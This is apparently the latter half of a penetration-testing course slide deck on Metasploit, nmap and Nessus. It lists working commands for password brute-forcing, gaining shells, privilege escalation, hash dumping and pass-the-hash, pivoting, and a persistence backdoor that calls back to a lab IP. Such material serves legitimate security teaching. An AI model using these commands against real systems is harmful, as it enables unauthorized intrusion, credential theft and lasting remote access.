  • 24. Metasploit and nmap Port scanning and just about everything else http://nmap.org/ man nmap Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1) msf > db_import subnet1.xml
  • 25. MSF Axillary Portscanners msf > search portscan (shows portscan modules) scanner/portscan/tcp (runs a TCP syn scan) Use auxiliary modules like exploits (use, set, exploit, etc.)
  • 26. Some Other MSF Scanners scanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version) scanner/ssh/ssh_version (queries the ssh version) scanner/ftp/anonymous (anonymous ftp login)
  • 27. Vulnerability Scanning Query systems for potential vulnerabilities Identify potential methods of penetration Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
  • 28. Metasploit and Nessus Tenable's Vulnerability Scanner (http://www.nessus.org) msf>load nessus msf > nessus_connect student1:password@192.168.20.103 ok (ok says no ssl is ok) msf > nessus_policy_list msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage) msf> nessus_report_list msf> nessus_report_get <report id>
  • 29. Metasploit Vulnerability Scanners SMB Login Given a set of credentials what systems can they access? scanner/smb/smb_login Open VNC and X11 If misconfigured may be accessible without credentials scanner/vnc/vnc_none_auth scanner/x11/open_x11
  • 30. Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
  • 31. Our Database hosts services vulns -c select columns -s search for specific string
  • 32. db_autopwn By default just runs all the exploits that match a given open port Not stealthy Using vulnerability data can be made smarter, matches vulnerabilities instead of ports db_autopwn -x -e
  • 33. Attacking MSSQL MSSQL TCP port can change, UDP port is 1434 msf> search mssql (shows all mssql modules) msf> use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port) msf> use scanner/mssql/mssql_login (tries passwords to log into mssql) msf> use windows/mssql/mssql_payload (logs into mssql and gets a shell
  • 34. We have a shell, now what? Privilege escalation Local information gathering Exploiting additional hosts Maintaining access Forensic avoidance
  • 35. Meterpreter: Privilege Escalation A session has the privileges of the exploited process getuid (tells you what user your session is running as) getsystem (tries various techniques to escalate privileges)
  • 36. Meterpreter: Enabling Remote Desktop Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group run getgui –e
  • 37. Meterpreter: Migrating If the process that hosts meterpreter closes meterpreter dies too Example: client side exploit residing in the browser meterpreter> ps (shows all processes) meterpreter> migrate <process id> (moves to a new process)
  • 38. Meterpreter: Searching for Content Look for specific interesting files on the exploited system search -h Example: search -f *.jpg (finds all the porn)
  • 39. Pivoting Scenario: Exploit a dual networked host, with a routeable interface and non routable one. Can we attack other hosts on the non routeable interface without SSH tunneling? Route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1) Now you can portscan, exploit, etc. the non routable subnet
  • 40. PSExec hashdump (dumps the hashes, not always easy to crack) Why not just pass the hash to other systems? use windows/smb/psexec set SMBPass to the hash
  • 41. Meterpreter: Persistence Persistence script installs a meterpreter service Meterpreter comes back when the box restarts Ex: run persistence -U -i 5 -p 443 –r 192.168.20.101 (respawns on login, at a 5 second interval on port 443 to ip 192.168.20.101)
  • 42. Exercises Perform a penetration test on the Windows and Linux systems we used in class Perform a penetration test on the lab network
  • 43. Contact Georgia Weidman Website: http://www.grmn00bs.com http://www.georgiaweidman.com Email: georgia@grmn00bs.com Twitter: @vincentkadmon